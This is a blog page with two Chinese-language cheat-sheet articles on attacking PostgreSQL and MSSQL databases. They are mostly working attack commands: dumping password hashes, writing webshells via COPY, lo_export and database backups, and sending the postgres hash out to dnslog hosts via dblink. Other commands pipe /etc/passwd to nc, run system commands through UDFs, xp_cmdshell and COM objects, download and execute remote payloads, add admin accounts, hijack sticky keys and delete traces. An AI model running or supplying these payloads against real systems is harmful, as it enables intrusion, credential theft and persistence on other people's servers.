Fri, 06 May 2022 12:00:00 +0800

Postgresql 数据库作为 python 应用中比较常见的数据库，其利用手段公开的不多,而且利用方式也比较单一，我搜集了国内外一些相关的利用思路进行总结，如有遗漏还请指正。

info

本文首发跳跳糖社区 https://tttang.com/archive/1547/

信息收集

查看服务器端版本

-- 详细信息
select version();

-- 版本信息
show server_version;
select pg_read_file('PG_VERSION', 0, 200);

-- 数字版本信息包括小版号
SHOW server_version_num;
SELECT current_setting('server_version_num');

列目录

-- 注意: 在早期的 PostgreSQL 版本中,pg_ls_dir 不允许使用绝对路径
select pg_ls_dir('/etc');

-- 获取 pgsql 安装目录
select setting from pg_settings where name = 'data_directory';

-- 查找 pgsql 配置文件路径
select setting from pg_settings where name='config_file'

列出数据库

`1`	`SELECT datname FROM pg_database;`

查看支持的语言

`1`	`select * from pg_language;`

查看安装的扩展

`1`	`select * from pg_available_extensions;`

查看服务器ip地址

1
2

-- 这里是运行在 docker 里的靶机,所以 ip 不一致
select inet_server_addr()

账号操作

查看当前用户是不是管理员权限

SELECT current_setting('is_superuser');
-- on 代表是, off 代表不是

SHOW is_superuser;
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;

查询密码

`1`	`SELECT usename, passwd FROM pg_shadow;`

`1`	`SELECT rolname,rolpassword FROM pg_authid;`

可以看到,目前查询到的用户 hash 已经是 scram-sha-256,在以前的版本是加盐md5

我们可以查询当前的加密方式

1
2

-- password_encryption参数决定了密码怎么被hash
SELECT name,setting,source,enumvals FROM pg_settings WHERE name = 'password_encryption';

添加用户

--创建 f0x，赋予角色属性
create user f0x password 'Abcd1234' superuser createrole createdb
--添加 f0x 到角色组
grant postgres to f0x

修改一个角色为管理员角色

`1`	`alter role f0x createrole;`

更改密码

`1`	`ALTER USER user_name WITH PASSWORD 'new_password';`

查看用户

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

查看管理员用户

`1`	`SELECT usename FROM pg_user WHERE usesuper IS TRUE`

获取用户角色

SELECT
      r.rolname,
      r.rolsuper,
      r.rolinherit,
      r.rolcreaterole,
      r.rolcreatedb,
      r.rolcanlogin,
      r.rolconnlimit, r.rolvaliduntil,
  ARRAY(SELECT b.rolname
        FROM pg_catalog.pg_auth_members m
        JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
        WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

PostgreSQL 读文件

方法1 pg_read_file

-- 注意: 在早期的 PostgreSQL 版本中,pg_read_file 不允许使用绝对路径
select pg_read_file('/etc/passwd');

-- 单引号被转义的情况下使用
select/**/PG_READ_FILE($$/etc/passwd$$)

方法2

1
2
3

create table testf0x(t TEXT);
copy testf0x from '/etc/passwd';
select * from testf0x limit 1 offset 0;

方法3 lo_import

lo_import 允许指定文件系统路径。该文件将被读取并加载到一个大对象中，并返回该对象的 OID。

Select lo_import('/etc/passwd',12345678);
select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a

-- 单引号被转义的情况下使用
select/**/lo_import($$/etc/passwd$$,11111);
select/**/cast(encode(data,$$base64$$)as/**/integer)/**/from/**/pg_largeobject/**/where/**/loid=11111

PostgreSQL 写文件

利用条件

拥有网站路径写入权限
知道网站绝对路径

方法1 COPY

COPY 命令可以用于表和文件之间交换数据，这里可以用它写 webshell

`1`	`COPY (select '<?php phpinfo();?>') to '/tmp/1.php';`

也可以 base64 一下

`1`	`COPY (select convert_from(decode('ZmZmZmZmZmYweA==','base64'),'utf-8')) to '/tmp/success.txt';`

方法2 lo_export

lo_export 采用大对象 OID 和路径，将文件写入路径。

select lo_from_bytea(12349,'ffffffff0x');
SELECT lo_export(12349, '/tmp/ffffffff0x.txt');

-- base64 的形式
select lo_from_bytea(12350,decode('ZmZmZmZmZmYweA==','base64'));
SELECT lo_export(12350, '/tmp/ffffffff0x.txt');

方法3 lo_export + pg_largeobject

-- 记下生成的lo_creat ID
select lo_creat(-1);

-- 替换 24577 为生成的lo_creat ID
INSERT INTO pg_largeobject(loid, pageno, data) values (24577, 0, decode('ZmZmZmZmZmYweA==', 'base64'));
select lo_export(24577, '/tmp/success.txt');

如果内容过多，那么首先创建一个 OID 作为写入的对象, 然后通过 0,1,2,3… 分片上传但是对象都为 12345 最后导出到 /tmp 目录下, 收尾删除 OID

写的文件每一页不能超过 2KB，所以我们要把数据分段，这里我就不拿 .so 文件为例了,就随便写个 txt 举个例子

SELECT lo_create(12345);
INSERT INTO pg_largeobject VALUES (12345, 0, decode('6666', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 1, decode('666666', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 2, decode('6666', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 3, decode('663078', 'hex'));
SELECT lo_export(12345, '/tmp/ffffffff0x.txt');
SELECT lo_unlink(12345);

或者还可以用 lo_put 在后面拼接进行写入

select lo_create(11116);
select lo_put(11116,0,'dGVzdDEyM');
select lo_put(11116,9,'zQ1Ng==');

select lo_from_bytea(11141,decode(encode(lo_get(11116),'escape'),'base64'));
select lo_export(11141,'/tmp/test.txt');
SELECT lo_unlink(11141);

结束记得清理 OID 内容

-- 查看创建的 lo_creat ID
select * from pg_largeobject

-- 使用 lo_unlink 进行删除
SELECT lo_unlink(12345);

PostgreSQL 创建文件夹

通过 log_directory 创建文件夹

方法来自于 https://www.yulegeyu.com/2020/11/16/Postgresql-Superuser-SQL%E6%B3%A8%E5%85%A5-RCE%E4%B9%8B%E6%97%85/ 这篇文章的场景

利用条件

目标已经配置了 logging_collector = on

描述

配置文件中的 log_directory 配置的目录不存在时，pgsql 启动会失败，但是如果日志服务已启动,在修改 log_directory 配置后再 reload_conf 目录会被创建

原理

logging_collector 配置是否开启日志，只能在服务开启时配置，reloadconf 无法修改,log_directory 用来配置 log 日志文件存储到哪个目录，如果 log_directory 配置到一个不存在的目录,pgsql 会创建目录。

测试

拿靶机中的 postgresql 为例，先查看配置文件的路径

`1`	`select setting from pg_settings where name='config_file'`

查看内容

`1`	`select pg_read_file('/var/lib/postgresql/data/postgresql.conf');`

将配置文件中的 log_directory 配置修改

log_destination = 'csvlog'
log_directory = '/tmp/f0x'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
log_rotation_size = 100MB
log_rotation_age = 1d
log_min_messages = INFO
logging_collector = on

转为 base64 格式

1
2

# 这里我将配置文件的内容存到了 out.txt 中
cat out.txt | base64 -w 0 > base64.txt

-- 将修改后的配置文件加载到largeobject中
select lo_from_bytea(10001,decode('base64的内容,这里略','base64'));

-- 通过lo_export覆盖配置文件
select lo_export(10001,'/var/lib/postgresql/data/postgresql.conf');
SELECT lo_unlink(10001);

-- 重新加载配置文件
select pg_reload_conf();

1
2

-- 查询一下修改是否成功
select name,setting,short_desc from pg_settings where name like 'log_%';

进入靶机,可以看到 f0x 目录已经创建

PostgreSQL 带外数据

-- 开启 dblink 扩展
CREATE EXTENSION dblink

-- 获取当前数据库用户名称
SELECT * FROM dblink('host='||(select user)||'.djw0pg.dnslog.cn user=test dbname=test', 'SELECT version()') RETURNS (result TEXT);

1
2

-- 查询当前密码
SELECT * FROM dblink('host='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')||'.c8jrsjp2vtc0000rwce0grjcc3oyyyyyb.interact.sh user=test dbname=test', 'SELECT version()') RETURNS (result TEXT);

-- nc 监听
nc -lvv 4444

select dblink_connect((select 'hostaddr=x.x.x.x port=4445 user=test password=test sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));

PostgreSQL 提权

利用 UDF 命令执行

在 8.2 以前,postgresql 不验证 magic block,可以直接调用本地的 libc.so

1
2

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc xxx.xx.xx.xx');

8.2 以上版本,需要自己编译 so 文件去创建执行命令函数，可以自己编译反弹 shell 后门，也可以用 sqlmap 提供好的

https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/postgresql

可以参考 No-Github/postgresql_udf_help

# 找相应的 dev 扩展包
apt-get search postgresql-server-dev
# 安装 dev 扩展包
apt-get install postgresql-server-dev-11
# apt install postgresql-server-dev-all

# 编译好 .so 文件
git clone https://github.com/No-Github/postgresql_udf_help
cd postgresql_udf_help
gcc -Wall -I/usr/include/postgresql/11/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
strip -sx lib_postgresqludf_sys.so

# 生成分片后的 sql 语句
cat lib_postgresqludf_sys.so | xxd -ps | tr -d "\n" > 1.txt
python2 postgresql_udf_help.py 1.txt > sqlcmd.txt

PL/Python 扩展

PostgreSQL 可以支持多种存储过程语言，官方支持的除了 PL/pgSQL，还有 TCL，Perl，Python 等。

默认 PostgreSQL 不会安装 Python 的扩展,这里我手动在靶机上安装下进行复现

`1`	`select version();`

先看下版本, pg 14

搜索下有没有对应的 plpython3u 版本安装

`1`	`apt search postgresql-plpython`

有,那么直接装

`1`	`apt install postgresql-plpython-14`

安装完毕后记得注册下扩展

`1`	`create extension plpython3u;`

查看是否支持 plpython3u

`1`	`select * from pg_language;`

创建一个 UDF 来执行我们要执行的命令

CREATE FUNCTION system (a text)
  RETURNS text
AS $$
  import os
  return os.popen(a).read()
$$ LANGUAGE plpython3u;

创建好 UDF 后，进行调用

`1`	`select system('ls -la');`

利用 session_preload_libraries 加载共享库

方法来自于 https://www.yulegeyu.com/2020/11/16/Postgresql-Superuser-SQL%E6%B3%A8%E5%85%A5-RCE%E4%B9%8B%E6%97%85/ 这篇文章的场景

描述

session_preload_libraries 只允许 superuser 修改，但可以加载任意目录的库，session_preload_libraries 配置从 pg10 开始存在，低于 pg10 时，可以使用 local_preload_libraries，不过该配置只允许加载 $libdir/plugins/ 目录下的库，需要将库写入到该目录下。

当每次有新连接进来时，都会加载 session_preload_libraries 配置的共享库。

和上面的利用 UDF 命令执行一样，不过不同点在于上面一个是创建 function 加载,这个方式是通过改配置文件中的 session_preload_libraries 进行加载，这里就不复现了

利用 ssl_passphrase_command 执行命令

方法来自于 https://pulsesecurity.co.nz/articles/postgres-sqli 这篇文章的场景

利用条件

需要知道 PG_VERSION 文件的位置 (不是 PG_VERSION 文件也行,pgsql限制私钥文件权限必须是0600才能够加载，pgsql目录下的所有0600权限的文件都是可以的,但覆盖后没啥影响的就 PG_VERSION 了)

描述

当配置文件中配置了 ssl_passphrase_command ，那么该配置在需要获取用于解密SSL文件密码时会调用该配置的命令。

通过上传 pem，key 到目标服务器上，读取配置文件内容，修改配置文件中的ssl配置改为我们要执行的命令，通过lo_export覆盖配置文件，最后通过 pg_reload_conf 重载配置文件时将执行命令

复现

这里以靶机上已经存在的2个密钥文件为例

1
2

/etc/ssl/certs/ssl-cert-snakeoil.pem
/etc/ssl/private/ssl-cert-snakeoil.key

通过文件读取获取私钥

`1`	`select pg_read_file('/etc/ssl/private/ssl-cert-snakeoil.key');`

对私钥文件加密

# 密码为 12345678
openssl rsa -aes256 -in ssl-cert-snakeoil.key -out private_passphrase.key

# 输出为 base64 格式
cat private_passphrase.key | base64 -w 0 > base.txt

上传 private_passphrase.key 到目标服务器上

由于 pgsql 限制私钥文件权限必须是 0600 才能够加载，这里搜索 pgsql 目录下的所有 0600 权限的文件,发现 PG_VERSION 文件符合条件，而且覆盖也没有太大影响

PG_VERSION 与 config_file 文件同目录，上传私钥文件覆盖 PG_VERSION，可绕过权限问题。

-- 将 private_passphrase.key 覆盖 PG_VERSION 文件
select lo_from_bytea(10004,decode('base64的内容,这里略','base64'));
select lo_export(10004,'/var/lib/postgresql/data/PG_VERSION');
SELECT lo_unlink(10004);

在靶机中查看验证是否写入成功

读取配置文件内容

1
2

select setting from pg_settings where name='config_file'
select pg_read_file('/var/lib/postgresql/data/postgresql.conf');

在原始配置文件内容末尾追加上ssl配置

ssl = on
ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'
ssl_key_file = '/var/lib/postgresql/data/PG_VERSION'
ssl_passphrase_command_supports_reload = on
ssl_passphrase_command = 'bash -c "touch /tmp/success & echo 12345678; exit 0"'

转为 base64 格式

1
2

# 这里我将配置文件的内容存到了 out.txt 中
cat out.txt | base64 -w 0 > base3.txt

-- 将修改后的配置文件加载到largeobject中
select lo_from_bytea(10001,decode('base64的内容,这里略','base64'));

-- 通过lo_export覆盖配置文件
select lo_export(10001,'/var/lib/postgresql/data/postgresql.conf');
SELECT lo_unlink(10001);

-- 重新加载配置文件
select pg_reload_conf();

可以看到,重新加载配置文件后,ssl_passphrase_command 中的命令已经执行

CVE-2018-1058 PostgreSQL 提权漏洞

PostgreSQL 其 9.3 到 10 版本中存在一个逻辑错误，导致超级用户在不知情的情况下触发普通用户创建的恶意代码，导致执行一些不可预期的操作。

详细复现可以参考 vulhub 靶场中的 writeup

https://vulhub.org/#/environments/postgres/CVE-2018-1058/

CVE-2019-9193 PostgreSQL 高权限命令执行漏洞

描述

PostgreSQL 其 9.3 到 11 版本中存在一处“特性”，管理员或具有“COPY TO/FROM PROGRAM”权限的用户，可以使用这个特性执行任意命令。

利用条件

版本9.3-11.2
超级用户或者pg_read_server_files组中的任何用户

相关文章

Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest

POC | Payload | exp

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

参考

mssql 提权(总结篇)

Wed, 20 Apr 2022 12:00:00 +0800

最近一段时间学习了 MSSQL 数据库提权相关的知识，总结了一些常见手段，应该是比较全的了，如有遗漏还请指正。

info

本文首发跳跳糖社区 https://tttang.com/archive/1545/

常见存储过程

首先先看几个常见的存储过程

xp_dirtree

xp_dirtree 用于显示当前目录的子目录，该存储过程有三个参数：

directory：第一个参数是要查询的目录；
depth ：第二个参数是要显示的子目录的深度，默认值是 0，表示显示所有的子目录；
file ：第三个参数是 bool 类型，指定是否显示子目录中的文件（file），默认值是 0，表示不显示任何文件，只显示子目录（directory）；

-- 只列 c:\ 文件夹
exec xp_dirtree 'c:',1
-- 列 c:\ 文件夹加文件
exec xp_dirtree 'c:',1,1
-- 列出所有 c:\ 文件和目录,子目录,内容会很多,慎用
exec xp_dirtree 'c:'

xp_dirtree 还可以用来触发 NTLM 请求

1
2

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'

xp_subdirs

xp_subdirs 用于得到给定的文件夹内的文件夹列表

1
2

-- 列出 C:\\ 目录
exec xp_subdirs "C:\\"

xp_fixeddrives

xp_fixeddrives 用于查看磁盘驱动器剩余（free）的空间

1
2

-- 查看磁盘驱动的空闲空间
EXEC xp_fixeddrives

xp_availablemedia

xp_availablemedia 用于获得当前所有驱动器

1
2

-- 列出磁盘
EXEC xp_availablemedia

xp_fileexist

用于判断文件是否存在的存储过程，参数是文件（file）的路径或目录的路径

1
2

-- 判断文件 D:\test.txt 是否存在
exec master.sys.xp_fileexist 'D:\test.txt'

xp_create_subdir

用于创建子目录的存储过程，参数是子目录的路径

1
2

-- 创建子目录 D:\test
exec master.sys.xp_create_subdir 'D:\test'

xp_delete_file

可用于删除文件的存储过程，但该存储过程不会删除任意类型的文件，系统限制它只能删除特定类型（备份文件和报表文件）的文件。

-- 删除文件
declare @Date datetime = dateadd(day,-30,getdate())
exec master.sys.xp_delete_file 0,'D:\test\','bak',@Date,0

-- 第一个参数是文件类型（File Type），有效值是0和1，0是指备份文件，1是指报表文件；
-- 第二个参数是目录路径（Folder Path）， 目录中的文件会被删除，目录路径必须以“\”结尾；
-- 第三个参数是文件的扩展名（File Extension），常用的扩展名是'BAK' 或'TRN'；
-- 第四个参数是Date，早于该日期创建的文件将会被删除；
-- 第五个参数是子目录（Subfolder），bool类型，0是指忽略子目录，1是指将会删除子目录中的文件；

xp_regenumkeys

xp_regenumkeys 可以查看指定的注册表

1
2

-- 枚举可用的注册表键值
exec xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International'

xp_regdeletekey

xp_regdeletekey 可以删除指定的注册表值

1
2

-- 删除指定的注册表值
EXEC xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe';

存储过程写webshell

利用条件

拥有DBA权限
知道的网站绝对路径

-- 首先判断当前是否为DBA权限，为1则可以提权
select is_srvrolemember('sysadmin');

-- 利用存储过程写入一句话,注意路径
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\www\test.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>'

差异备份写webshell

描述

在 sql server 里 dbo 和 sa 权限都有备份数据库权限，我们可以把数据库备份成 asp 文件，获得 webshell

利用条件

需要知道绝对路径，路径可写

-- 生成备份文件,注意库名和路径
backup database test to disk = 'c:\www\bak.bak';

-- 创建表：
create table [dbo].[test] ([cmd] [image]);

-- 插入一句话：<%execute(request("a"))%>
insert into test(cmd)  values(0x3C25657865637574652872657175657374282261222929253E)

-- 再次备份,注意路径
backup database test to disk='C:\www\shell.asp' WITH DIFFERENTIAL,FORMAT;

因为权限的问题，最好不要备份到盘符根目录，如果这种方式失败，大概率是备份的目录没有写权限

当过滤了特殊的字符比如单引号，或者路径符号都可以使用定义局部变量来执行。

日志备份写webshell

优势：

重复性好，多次备份的成功率高
相对于差异备份而言，shell的体积较小

利用条件：

拥有DBA权限
知道网站绝对路径，并且可写
站库不分离
数据库必须被备份过一次

-- 判断当前是否为DBA权限，为1则可以提权
select is_srvrolemember('sysadmin');

-- 利用存储过程写入一句话,注意库名和路径
alter database 库名 set RECOVERY FULL
create table cmd (a image)
backup log 库名 to disk = 'c:\www' with init
insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)
backup log 库名 to disk = 'c:\www\2.asp'

sp_addextendedproc

sp_addextendedproc 可以利用于恢复组件

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'

xp_cmdshell

描述

xp_cmdshell 是 Sql Server 中的一个组件，我们可以用它来执行系统命令。

利用条件

拥有 DBA 权限, 在 2005 中 xp_cmdshell 的权限是 system，2008 中是 network。
依赖 xplog70.dll

-- 判断当前是否为DBA权限，为1则可以提权
select is_srvrolemember('sysadmin');

-- 查看是否存在 xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

-- 查看能否使用 xp_cmdshell，从MSSQL2005版本之后默认关闭
select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'

-- 关闭 xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

-- 开启 xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

-- 执行 xp_cmdshell
exec master..xp_cmdshell 'cmd /c whoami'

-- xp_cmdshell 调用cmd.exe用powershell 远程下载exe并执行
exec master..xp_cmdshell '"echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile("http://example/test0.exe","%TEMP%\test.exe") >> %TEMP%\test.ps1 & powershell  -ExecutionPolicy Bypass  %temp%\test.ps1 & WMIC process call create "%TEMP%\test.exe""'

无会显,也无法进行 dnslog 怎么办

通过临时表查看命令执行的结果

1
2
3

CREATE TABLE tmpTable (tmp1 varchar(8000));
insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig'
select * from tmpTable

常见报错

标记message: 配置选项 ‘xp_cmdshell’ 不存在，也可能是高级选

`1`	`EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'user connections',1;RECONFIGURE;`

痕迹清理

删除扩展存储过过程 xp_cmdshell

`1`	`exec sp_dropextendedproc 'xp_cmdshell'`

如果 xp_cmdshell 被删除了怎么办

如果 xp_cmdshell 被删除了，需要重新恢复或自己上传 xplog70.dll 进行恢复

以mssql2012为例，默认路径为

`1`	`C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\xplog70.dll`

-- 判断存储扩展是否存在,返回结果为1就OK
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

-- 恢复xp_cmdshell,返回结果为1就OK
Exec sp_addextendedproc 'xp_cmdshell','xplog70.dll';
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

-- 否则上传xplog70.dll
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

bypass

`1`	`‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping xxx.burpcollaborator.net’ —`

sp_oacreate (Ole Automation Procedures)

利用条件

拥有DBA权限
依赖 odsole70.dll

-- 判断当前是否为DBA权限，为1则可以提权
select is_srvrolemember('sysadmin');

-- 判断SP_OACREATE状态,如果存在返回1
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

-- 启用 sp_oacreate
exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

-- 关闭 sp_oacreate
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;

wscript.shell 组件执行命令

declare @ffffffff0x int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate 'wscript.shell',@ffffffff0x output
exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

1
2
3

declare @ffffffff0x int
exec sp_oacreate 'wscript.shell',@ffffffff0x output
exec sp_oamethod @ffffffff0x,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\www\\1.txt'

利用 com 组件执行命令

declare @ffffffff0x int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@ffffffff0x output
exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

利用 com 组件写文件

DECLARE @ObjectToken INT;
EXEC Sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}',@ObjectToken OUTPUT;
EXEC Sp_OASetProperty @ObjectToken, 'Type', 1;
EXEC sp_oamethod @ObjectToken, 'Open';
EXEC sp_oamethod @ObjectToken, 'Write', NULL, 0x66666666666666663078;
EXEC sp_oamethod @ObjectToken, 'SaveToFile', NULL,'ffffffff0x.txt',2;
EXEC sp_oamethod @ObjectToken, 'Close';
EXEC sp_OADestroy @ObjectToken;

filesystemobject COM 对象利用

https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/filesystemobject-object

filesystemobject”COM 对象允许我们复制文件、管理驱动器等等。

-- 利用 filesystemobject 写vbs脚本
declare @o int, @f int, @t int, @ret int,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah'

-- 配合 wscript.shell 组件执行
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run],NULL,[c:\\www\\ffffffff0x.vbs]

-- 复制具有不同名称和位置的 calc.exe 可执行文件
declare @ffffffff0x int;
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out;
exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\calc_copy.exe';

-- 移动文件
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject',@ffffffff0x out
exec sp_oamethod @ffffffff0x,'movefile',null,'c:\\www\\1.txt','c:\\www\\3.txt'

-- 删除文件
declare @result int
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'deletefile',null,'c:\\www\\1.txt'
exec sp_oadestroy @ffffffff0x

-- 替换粘滞键
declare @ffffffff0x int;
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out;
exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\sethc.exe';

declare @ffffffff0x int;
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out;
exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'

ScriptControl COM 对象利用(未测试成功)

https://developpaper.com/introduction-of-msscriptcontrol-scriptcontrol-component-properties-methods-and-events/

ScriptControl 允许我们在 SQL Server 中实际运行脚本语言，例如 VBScript 或 JavaScript。

-- 使用 JavaScript 创建帐户、更改其密码并将新帐户添加到管理员组
declare @ffffffff0x int
EXEC sp_OACreate 'ScriptControl',@ffffffff0x OUT;
EXEC sp_OASetProperty @ffffffff0x, 'Language', 'JavaScript';
EXEC sp_OAMethod @ffffffff0x, 'Eval', NULL,
    'var o=new ActiveXObject("Shell.Users");
    z=o.create("testuser");
    z.changePassword("123456!@#","")
    z.setting("AccountType")=3;';

-- 0:"Guests"
-- 1:"Users"
-- 2:"Power Users"
-- 3:"Administrators"

-- 下载恶意软件
declare @ffffffff0x int
EXEC sp_OAcreate 'Scriptcontrol',@ffffffff0x OUT;
EXEC sp_OASetProperty @ffffffff0x, 'Language', 'JavaScript';
EXEC sp_OAMethod @ffffffff0x, 'Eval', NULL,
    'var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET","http://x.x.x.x:443/test.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    S.Write(x.responseBody);
    s.SaveToFile("C:\\www\\test.exe",2);
    var r = new ActiveXObject("WScript.Shell");
    r.Run("C:\\www\\test.exe");';

WMI COM 对象利用

declare @objWmi int,@objLocator int,@objPermiss int,@objRet int,@objFull varchar(8000)
EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''wscript.exe''';
EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT, 'Win32_SecurityDescriptor';
EXEC sp_OASetProperty @objFull,'ControlFlags',4;
EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;

xp_regwrite

利用条件

xpstar.dll

修改注册表来劫持粘贴键(映像劫持)

利用regwrite函数修改注册表，起到劫持作用

exec master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

-- 检查是否劫持成功
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

将 COM 对象注册到 CLSID

在进行 sp_oacreate 利用的时候就有使用 com 组件执行命令的方法

-- 使用其 CLSID '0D43FE01-F093-11CF-8940-00A0C9054228' 注册 'The File System Object component'
EXEC xp_regwrite N'HKEY_ CLASSES_ROOT',
N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\', N'', REG_SZ, N'FileSystem Object';
EXEC xp_regwrite N'HKEY_CLASSES_ROOT',
N'CLSID\(0D43FE01-F093-11CF-8940-00A0C9054228}\InProcServer32', N'',
REG_SZ, N'%systemroot%\system32\scrrun.dll';
EXEC xp_regwrite N'HKEY_CLASSES_ROOT',
N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID',N'',REG_SZ,
N'Scripting.FileSystemObject';
